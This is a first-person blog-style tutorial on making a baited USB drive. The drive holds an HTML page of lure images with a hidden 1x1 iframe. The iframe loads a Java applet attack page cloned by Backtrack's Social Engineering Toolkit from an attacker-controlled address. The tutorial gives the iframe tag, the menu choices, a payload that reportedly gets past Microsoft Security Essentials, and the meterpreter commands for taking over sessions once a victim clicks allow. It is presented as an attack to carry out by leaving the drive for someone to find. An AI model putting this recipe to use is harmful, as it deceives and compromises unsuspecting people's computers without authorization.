I wanted to experiment with the social engineering toolkit in Backtrack5r3 and it was decided that I should try to create an infectious USB drive. However, I had learned that XP and newer Windows operating systems had disabled the autorun feature (vulnerability). So the need arose for a different kind of attack vector. I had thought about it and came up with an idea: create an html web page file to put on the USB drive that has an iframe tag which will load a “malicious” web site when the user clicks on it. This way, when the user clicks on the seemingly “local” file, if he’s connected to the internet, it will actually open our malicious web site being hosted by backtrack’s social engineering toolkit. Of course one of the tricks will be to make the “local” web page enticing to click on-I thought about calling it iphone pics or something like that-because I think people are inclined to view pictures. The first step is to setup the social engineering toolkit in backtrack. Open a terminal and change directory to where the toolkit is located(this article is using backtrack 5r3), then type “./set”. This will start the toolkit and the first time it is run it will ask you to agree to its terms.
Then a menu comes up for you to choose from-for this attack we select the 1st option
Yes another menu (the social engineering toolkit is chalked full of menus) and the attack I found particularly reliable would be option 1-the java applet attack method.
In the next menu, you are given a choice of what webpage content to use-I just pick option 1 for the sake of simplicity.
Another menu where the choice is arbitrary (however I find option 1 doesn’t take a long time to load in the client’s browser, giving you more of a chance of them not closing the program before attack)
Then it clones a website, injects the java applet attack into the website and asks for a payload. This part took some trial and error experimenting. It seems that every time I would try a meterpreter payload, no matter how it was encoded to avoid anti-virus, Microsoft Security Essentials would step in and prevent the attack from occurring (even when I generated a binary just to autorun or a malicious pdf setup to run a binary with meterpreter payload that was encoded-Microsoft Security Essentials would delete it automatically). So I decided to try option 11-the SE Toolkit Interactive Shell and had reliable results. *UPDATE* Upon apt-get upgrade I got a newer version of SET (even though there is an update option in the menu for some reason it didn’t work?) And I tried option 14 shellCodeExec Alphanum Shellcode which made it past Microsoft Security Essentials with a successful meterpreter session established!
Once the website and payload have been set up, now we setup the usb drive with the html file. The code is very simple:img src=”./iphone/6.jpg”
here’s where the “magic happens” the iframe tag: IFRAME SRC=”http://backtrack5r3-ip address” WIDTH=1 HEIGHT=1 TITLE=”Java Required”
I loaded the webpage with some generic, sexy pictures of women (I typed sexy pictures into google picture search-this was the best research ever!) to arise suspicion in the victim and put the in-line frame code to the malicious website at the bottom-this way there is content to fill the screen and more of a chance they won’t see or catch on to the fake java required frame at the bottom. So now the usb drive is ready to be “left” somewhere and when the victim clicks on the seemingly “local” webpage, it will load the inline frame to the fake java required website. The java security “run or cancel” prompt comes up numerous times (it’s actually kind of annoying) and in the scramble hopefully our victim will click allow, which will allow his box to be owned. Here is a screenshot showing the payload handler running (the payload was meterpreter) and I (victim) must have pressed allow because you can see a meterpreter session being opened near the bottom….
A few more sessions were opened, which I found by the command “sessions –l” (like list)
Using the command “sessions –i (as in interact) 1 (or the number session you want to interact with) I got a meterpreter prompt where I can use all the fun commands!